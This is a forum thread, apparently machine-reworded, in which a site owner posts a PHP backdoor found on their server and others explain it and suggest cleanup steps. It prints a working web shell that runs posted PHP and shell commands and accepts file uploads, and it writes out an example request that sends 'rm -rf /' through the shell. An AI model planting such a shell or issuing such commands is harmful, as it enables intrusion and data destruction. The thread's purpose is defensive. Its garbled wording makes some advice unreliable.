I lately found 4 bizarre files on my small server (which i did not upload). The filename were really like this: goog1e7a20543b128921.php

And here's the code which was included:

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

Have you got any idea what this code should really do..? Must I begin to stress..?

Thanks.

eval($e) - remote execute command system - eq. for listind directory $_FILES['f']['name'] - for uploand script to server eq hack tools etc

apparently you aren't the sole one with one of these. researched it here real quick, other sites appear infected too. it appears like constantly the infected file stores itself within the images folder.

Related: Try setting up phpAntiVirus for future years, and request your provider for mod_security. This may mitigate future hacks. Individuals files did not materialize simply by itself in your server anyway. Eliminate all older PHP programs.

Search for this in every file. script src="http://nt02.co.in/3"> if you discover one making use of your ftp consider the date the files was modified and open all of the files modified on that date and take away it.

badbo Monster Killer

For reference:

if($e){eval($e);}

This enables the attacker to complete any PHP command they need.

if($s){system($s);}

This enables the attacker to complete any system command they need, as whatever user your webserver runs as.

if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}

This enables the attacker to upload any file they need - again the consumer your webserver runs as determines file permissions.

To sum up, stress :-p

I am sure you will find plenty of articles online on how to approach this. Briefly, support the body for analysis later, re-install server on your own (You do not know what else they've completed to you so just removing the files is not adequate.) while working out the way they got in and inserting the opening.

Remove them right NOW!


It is a backdoor to your webserver.
It enables attackers to transmit a request to http://you.com/goog1e7a20543b128921.php?s=rm -rf / to remove your whole system.

Next conduct an intensive security overview of your website to determine the way they arrived to begin with.

Yep, this really is malicious code. This spend script allows to complete code in addition to upload any file may be the attacker knows the parameters passed into it. I suggest searching all files for your code, verify file permission and alter your passwords just just in case.

Suggestion to handle the attack

I recommend you to employ the HTML Purifier or OWASP to create things a great deal secure.

You must disable the eval construct if you're not by using their (and also you should not unless of course you will need to).

Evaluate the server configurations for just about any security holes with:

PHPSecInfo

alt text